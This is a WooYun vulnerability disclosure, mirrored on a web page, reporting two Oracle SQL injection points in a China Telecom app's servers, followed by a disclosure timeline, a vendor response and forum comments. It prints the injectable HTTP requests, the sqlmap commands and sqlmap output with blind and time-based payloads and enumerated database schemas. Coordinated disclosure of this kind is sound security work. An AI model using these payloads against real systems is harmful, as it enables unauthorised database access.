中国电信某APP服务端Oracle数据库注射

2015年6月13日02:28:04评论300 views字数 232阅读0分46秒阅读模式

摘要

2014-09-10：细节已通知厂商并且等待厂商处理中
2014-09-12：厂商已经确认，细节仅向厂商公开
2014-09-22：细节向核心白帽子及相关领域专家公开
2014-10-02：细节向普通白帽子公开
2014-10-12：细节向实习白帽子公开
2014-10-23：细节向公众公开

漏洞概要关注数(13) 关注此漏洞

缺陷编号： WooYun-2014-75462

漏洞标题：中国电信某APP服务端Oracle数据库注射

漏洞作者：超威蓝猫

提交时间： 2014-09-10 15:26

公开时间： 2014-10-23 15:28

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： SQL注射

0人收藏

漏洞详情

披露状态：

简要描述：

中国电信某APP服务端Oracle数据库两处注射

详细说明：

从豌豆荚下载中国电信的"天翼用户中心"APP

code 区域

注射点1

打开应用后抓包发现这么一条请求:

code 区域

GET /commonserver/query?sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9 HTTP/1.1
 Host: **.**.**.**:6060
 Connection: Keep-Alive
 User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

其中key参数存在SQL注射。

code 区域

注射点2

与注射点1同IP的一个管理后台登录页存在SQL注射

code 区域

POST /busmaintainsystem/admin/login/loginaction.php HTTP/1.1
 Content-Length: 99
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Referer: http://**.**.**.**:8802/
 Cookie: PHPSESSID=bf86kl6tb39b6cvp0vjob3idi2
 Host: **.**.**.**:8802
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*
 
 account=1&action=login&password=2

account参数存在SQL注射。

漏洞证明：

code 区域

[注射点1] sqlmap.py -r e:/1.txt --dbs --current-user

code 区域

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: GET
 Parameter: key
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9' AND 6763=6763 AND 'KsXs'='KsXs
 
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind
     Payload: sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9' AND 5155=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(107)||CHR(119)||CHR(74),5) AND 'zqSt'='zqSt
 ---
 web server operating system: Windows
 web application technology: Apache 2.2.22
 back-end DBMS: Oracle
 current user:    'CXL_POI'
 available databases [18]:
 [*] BESTTONE
 [*] CTXSYS
 [*] CXL_POI
 [*] CXL_POI_EXCHANGE
 [*] EXFSYS
 [*] GEOCODINGTESTSDE
 [*] HB_MAP_ATTRIBUTE
 [*] HB_MAP_SDE
 [*] HB_POI
 [*] HB_PRODUCE_PREPARE
 [*] HB_PRODUCE_RESULT
 [*] HB_PRODUCE_SOURCE
 [*] KNOWLEDGE
 [*] MDSYS
 [*] OLAPSYS
 [*] SDE
 [*] SYS
 [*] SYSTEM

code 区域

[注射点2] sqlmap.py -r e:/3.txt --dbs --current-user

code 区域

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: POST
 Parameter: account
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind
     Payload: account=1' AND 3751=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(82)||CHR(85)||CHR(68),5) AND 'dlnL'='dlnL&action=login&password=2
 ---
 web server operating system: Windows
 web application technology: Apache 2.2.22, PHP 5.4.3
 back-end DBMS: Oracle
 current user:    'CXL_POI_EXCHANGE'
 available databases [1]:
 [*] CXL_POI_EXCHANGE

修复方案：

电信更专业

版权声明：转载请注明来源超威蓝猫@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-09-12 17:08

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT直接通报给中国电信集团公司处置。按多个漏洞评分，rank 15

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-08 16:49 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

1

路过看了

1# 回复此人
2014-09-08 16:57 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子，但是除了他华...)

0

你妈炸

2# 回复此人
2014-09-08 19:28 | Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)

0

mark

3# 回复此人
2014-09-13 12:27 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖，不如相濡以沫)

0

youke

4# 回复此人
2014-10-24 19:18 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

0

楼主上次你说burp截断模拟器设置代理。怎么设置啊？难道需要下载软件？望解答，谢谢

5# 回复此人
2014-10-25 09:54 | 超威蓝猫 ( 核心白帽子 | Rank:1133 漏洞数:122 | STEAM_0:0:55968383)

0

@小豹 http://www.cn-sec.com/drops//tips/2247

6# 回复此人
2014-10-25 13:12 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

0

@超威蓝猫 3Q

7# 回复此人

漏洞概要 关注数(13) 关注此漏洞

缺陷编号： WooYun-2014-75462

漏洞标题： 中国电信某APP服务端Oracle数据库注射

相关厂商： 中国电信

漏洞作者： 超威蓝猫

提交时间： 2014-09-10 15:26

公开时间： 2014-10-23 15:28

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 12

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： SQL注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(13) 关注此漏洞

漏洞标题：中国电信某APP服务端Oracle数据库注射

相关厂商：中国电信

漏洞作者：超威蓝猫

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

版权声明：转载请注明来源超威蓝猫@乌云

漏洞评价(共0人评价):

登陆后才能进行评分